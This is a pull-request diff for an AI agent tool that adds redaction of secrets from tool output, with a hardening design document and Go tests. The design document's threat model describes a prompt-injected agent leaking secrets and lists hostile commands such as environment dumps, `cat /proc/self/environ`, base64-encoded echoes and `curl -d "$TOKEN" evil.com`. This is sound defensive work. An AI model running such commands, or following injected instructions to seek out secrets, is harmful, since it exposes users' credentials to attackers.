Skip to content
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
4 changes: 4 additions & 0 deletions cmd/odek/subagent.go
Original file line number Diff line number Diff line change
Expand Up @@ -13,6 +13,7 @@ import (
"github.com/BackendStack21/odek/internal/config"
"github.com/BackendStack21/odek/internal/danger"
"github.com/BackendStack21/odek/internal/llm"
"github.com/BackendStack21/odek/internal/redact"
"github.com/BackendStack21/odek/internal/render"
"github.com/BackendStack21/odek/internal/skills"
)
Expand Down Expand Up @@ -263,6 +264,9 @@ func subagentCmd(args []string) error {
// tool the agent runs that prints its own env.
if fdKey := readKeyFromInheritedFD(); fdKey != "" {
resolved.APIKey = fdKey
// Register the FD-supplied key so it is redacted from tool output
// (LoadConfig only saw the env-resolved value, which may be empty here).
redact.RegisterSecret(fdKey)
}

// Apply parent-supplied trust constraints. When the parent marked the
Expand Down
127 changes: 127 additions & 0 deletions docs/REDACTION_HARDENING.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,127 @@
# Redaction Hardening Plan

Status: in progress. The first increment (known-value redaction + Telegram
token pattern) ships in `internal/redact`. This document is the roadmap for
making the redaction layer robust against the full set of known attacks on
**the tools surface**, and an honest statement of what redaction can and
cannot defend.

---

## Scope and why

odek's redaction layer (`internal/redact`) sanitises **tool output** before it
is appended to the conversation and persisted to the session
(`internal/loop/loop.go`, `internal/session/session.go`). It exists so that a
secret which surfaces in a command's output — accidentally or because a
prompt-injected agent went looking for it — does not end up in the transcript,
the session file, the model provider's logs, or a Telegram chat.

The surface we harden is deliberately narrow: **what tools return to the
agent.** We do *not* try to scrub odek's own process environment, because the
agent process legitimately needs its secrets — above all the LLM API key it
uses to talk to the model. Removing the key from the process is not an option;
keeping it from *leaking back out through tool output* is. That makes the
redaction layer the right control, and it must be as close to airtight as a
lexical filter can be.

## Threat model (tools surface)

An attacker who has achieved prompt injection drives the agent to disclose a
secret it can read, by routing it through tool output that returns to the
transcript. Concretely:

| # | Vector | Example | Pre-fix status |
|---|--------|---------|----------------|
| 1 | Env dump of well-named, standard-format key | `env`, `printenv` | Caught (format + name patterns) |
| 2 | Bare echo of a non-standard-format secret | `echo $TELEGRAM_BOT_TOKEN` | **Leaked** |
| 3 | Encoded secret | `echo $API_KEY \| base64`, `\| xxd`, `\| rev` | **Leaked** |
| 4 | `/proc` environ dump | `cat /proc/self/environ` | Partially (NUL-delimited, name pattern needs `NAME=`) |
| 5 | Secret read from a file | `cat ~/.config/odek/secrets.env` | Depends on format |
| 6 | Secret embedded in a longer string | `curl -H "x: $TOKEN" ...` echoed back in verbose output | Depends on format |

Vectors 2–4 are the gaps this work closes.

## Out of scope for redaction (documented limits)

These are **not** solvable by a lexical filter and must be defended elsewhere
(network-egress controls, approval gating, `non_interactive: deny`):

- **Arbitrary transformation** — `gzip`, `openssl enc`, gpg, custom character
substitution, chunking a secret across multiple commands. We precompute the
*common* encodings (base64, hex, url, reversed); we cannot enumerate all of
them.
- **Side-channel exfiltration** — `curl -d "$TOKEN" evil.com`, a reverse
shell, DNS tunnelling. The secret never returns to the tool surface, so
redaction never sees it. This is the job of the egress denylist and
`network_egress: prompt` + `non_interactive: deny` in the danger config.

Redaction is a **safety net against disclosure into the transcript**, not a
guarantee against a determined exfiltration attempt. Defense in depth: pair it
with the egress controls.

---

## Design

Two cooperating layers run inside `RedactSecrets`:

### Layer 1 — Known-value redaction (new)

odek knows its own secrets. We register them at startup and redact the exact
values — plus their common encodings — wherever they appear, regardless of
format. This closes vectors 2, 3, and 4 for odek's own secrets.

- `RegisterSecret(value)` — records a value and its encodings: base64
(std/raw/url), hex (upper/lower), percent-encoding, reversed.
- `RegisterSecretsFromEnv()` — registers values of env vars whose name has a
secret-bearing segment (`KEY`, `TOKEN`, `SECRET`, `PASSWORD`, `PASS`,
`CREDENTIAL`, …), matched on whole `_`/`-` segments so `GIT_AUTHOR_NAME`
(AUTHOR) and `compass` (PASS) are *not* treated as secrets.
- Seeded once in `config.LoadConfig` from the resolved API key, the Telegram
bot token, and the environment; and in the subagent path for the
FD-supplied key.
- Values shorter than `minSecretLen` (8) are ignored to avoid over-redacting
ordinary text. Matching is literal (a `strings.Replacer`), so no regex
metacharacter or ReDoS risk from arbitrary secret contents.

### Layer 2 — Format patterns (existing, extended)

Regex patterns for secrets we *don't* hold but recognise by shape (a
customer's AWS key in a file, a GitHub PAT, a private key). Extended here with
a **Telegram bot token** pattern (`<bot-id>:<35-char>`), which has no `name=`
context for the generic rule to catch.

## Implemented in this PR

- `internal/redact/redact.go`: known-value registry (`RegisterSecret`,
`RegisterSecretsFromEnv`, `ResetSecrets`), encoding-aware literal matching,
wired into `RedactSecrets` / `HasSecrets` / `CountSecrets`; Telegram
bot-token pattern.
- `internal/config/loader.go`: seed the registry at startup.
- `cmd/odek/subagent.go`: register the FD-supplied API key.
- `internal/redact/known_value_test.go`: coverage for vectors 2–4, env-scan
selectivity, and the short-value guard.

## Follow-ups (not in this PR)

1. **Streaming redaction across chunk boundaries.** A secret split across two
streamed tool-output chunks evades per-chunk redaction. Buffer a sliding
window equal to the longest registered form.
2. **Entropy heuristic for unknown secrets.** Flag high-entropy tokens of
secret-like length that match no pattern and no known value, to catch
third-party secrets read from files (vector 5) — tuned to avoid hashes/UUIDs.
3. **Redaction telemetry.** Count redaction hits per session and surface a
warning when tool output contained secrets, so operators notice exfil
attempts rather than silently dropping them.
4. **Argument/echo-back coverage (vector 6).** Consider redacting tool *inputs*
(command strings) that embed a known value, not just outputs.
5. **Periodic re-seed.** If secrets can rotate at runtime, re-run
`RegisterSecretsFromEnv` on reload.

## Testing

`go test ./internal/redact/` covers each closed vector. New tests:
`TestTelegramBotTokenPattern`, `TestKnownValue_BareEcho`,
`TestKnownValue_Encodings`, `TestKnownValue_ProcEnvironDump`,
`TestRegisterSecretsFromEnv`, `TestRegisterSecret_TooShortIgnored`.
11 changes: 11 additions & 0 deletions internal/config/loader.go
Original file line number Diff line number Diff line change
Expand Up @@ -24,6 +24,7 @@ import (
"github.com/BackendStack21/odek/internal/danger"
"github.com/BackendStack21/odek/internal/mcpclient"
"github.com/BackendStack21/odek/internal/memory"
"github.com/BackendStack21/odek/internal/redact"
"github.com/BackendStack21/odek/internal/skills"
"github.com/BackendStack21/odek/internal/telegram"
)
Expand Down Expand Up @@ -727,6 +728,16 @@ func LoadConfig(cli CLIFlags) ResolvedConfig {
os.Unsetenv("DEEPSEEK_API_KEY")
os.Unsetenv("OPENAI_API_KEY")

// Seed the redaction layer with odek's own secrets so they (and their
// common encodings) are stripped from any tool output, even when the
// agent prints them in a format the pattern matchers don't recognise.
// The API key is registered from its resolved value (the unsets above
// only remove it from the environment, not from resolved.APIKey);
// RegisterSecretsFromEnv covers .env / secrets.env injected values.
redact.RegisterSecret(resolved.APIKey)
redact.RegisterSecret(resolved.Telegram.Token)
redact.RegisterSecretsFromEnv()

return resolved
}

Expand Down
126 changes: 126 additions & 0 deletions internal/redact/known_value_test.go
Original file line number Diff line number Diff line change
@@ -0,0 +1,126 @@
package redact

import (
"encoding/base64"
"encoding/hex"
"strings"
"testing"
)

// TestTelegramBotTokenPattern covers the format-pattern gap: a bare Telegram
// bot token has no name= context and no recognised key prefix, so before the
// dedicated pattern it slipped through unredacted.
func TestTelegramBotTokenPattern(t *testing.T) {
ResetSecrets()
token := "123456789:AAHfakeTokenValueExample0123456789abcdef"
out := RedactSecrets("bot token is " + token)
if strings.Contains(out, token) {
t.Fatalf("telegram token not redacted by pattern: %q", out)
}
if !strings.Contains(out, "[REDACTED]") {
t.Fatalf("expected [REDACTED] marker, got %q", out)
}
}

// TestKnownValue_BareEcho covers the core gap: a registered secret whose
// format no pattern recognises must still be redacted when printed verbatim.
func TestKnownValue_BareEcho(t *testing.T) {
ResetSecrets()
defer ResetSecrets()

// A token shape no built-in pattern matches.
secret := "xz9-CUSTOM-internal-credential-2f7b1c4e8d"
RegisterSecret(secret)

if got := RedactSecrets("value: " + secret); strings.Contains(got, secret) {
t.Fatalf("registered secret leaked in bare echo: %q", got)
}
if !HasSecrets(secret) {
t.Fatalf("HasSecrets should detect a registered value")
}
}

// TestKnownValue_Encodings covers the "echo $KEY | base64 / xxd" gap: common
// encodings of a registered secret must also be redacted.
func TestKnownValue_Encodings(t *testing.T) {
ResetSecrets()
defer ResetSecrets()

secret := "sk-ant-internal-do-not-leak-abcdef0123456789"
RegisterSecret(secret)
b := []byte(secret)

cases := map[string]string{
"raw": secret,
"base64-std": base64.StdEncoding.EncodeToString(b),
"base64-raw": base64.RawStdEncoding.EncodeToString(b),
"base64-url": base64.URLEncoding.EncodeToString(b),
"hex-lower": hex.EncodeToString(b),
"hex-upper": strings.ToUpper(hex.EncodeToString(b)),
"reversed": reverseString(secret),
}
for name, enc := range cases {
out := RedactSecrets("leaked=" + enc)
if strings.Contains(out, enc) {
t.Errorf("%s encoding leaked: %q", name, out)
}
}
}

// TestKnownValue_ProcEnvironDump simulates `cat /proc/self/environ`, whose
// NUL-delimited output the literal matcher handles regardless of delimiters.
func TestKnownValue_ProcEnvironDump(t *testing.T) {
ResetSecrets()
defer ResetSecrets()

secret := "telegram-bot-secret-value-9988776655"
RegisterSecret(secret)

dump := "PATH=/usr/bin\x00HOME=/root\x00TELEGRAM_BOT_TOKEN=" + secret + "\x00TERM=xterm"
out := RedactSecrets(dump)
if strings.Contains(out, secret) {
t.Fatalf("secret leaked in /proc environ dump: %q", out)
}
}

// TestRegisterSecretsFromEnv only registers values of sensitively-named vars.
func TestRegisterSecretsFromEnv(t *testing.T) {
ResetSecrets()
defer func() {
osEnviron = defaultOsEnviron
ResetSecrets()
}()

secret := "anthropic-key-value-abcdefghij1234567890"
authorName := "Jane Developer"
osEnviron = func() []string {
return []string{
"ANTHROPIC_API_KEY=" + secret,
"GIT_AUTHOR_NAME=" + authorName, // AUTHOR must NOT be treated as secret
"PATH=/usr/bin",
}
}
RegisterSecretsFromEnv()

if got := RedactSecrets("k=" + secret); strings.Contains(got, secret) {
t.Errorf("env secret not redacted: %q", got)
}
if got := RedactSecrets("author is " + authorName); !strings.Contains(got, authorName) {
t.Errorf("non-secret env var over-redacted: %q", got)
}
}

// TestRegisterSecret_TooShortIgnored guards against over-redacting short
// values that would collide with ordinary text.
func TestRegisterSecret_TooShortIgnored(t *testing.T) {
ResetSecrets()
defer ResetSecrets()

RegisterSecret("abc") // below minSecretLen
if HasSecrets("abc appears in normal prose") {
t.Fatalf("short value should not have been registered")
}
}

// defaultOsEnviron preserves the production osEnviron for restore in tests.
var defaultOsEnviron = osEnviron
Loading
Loading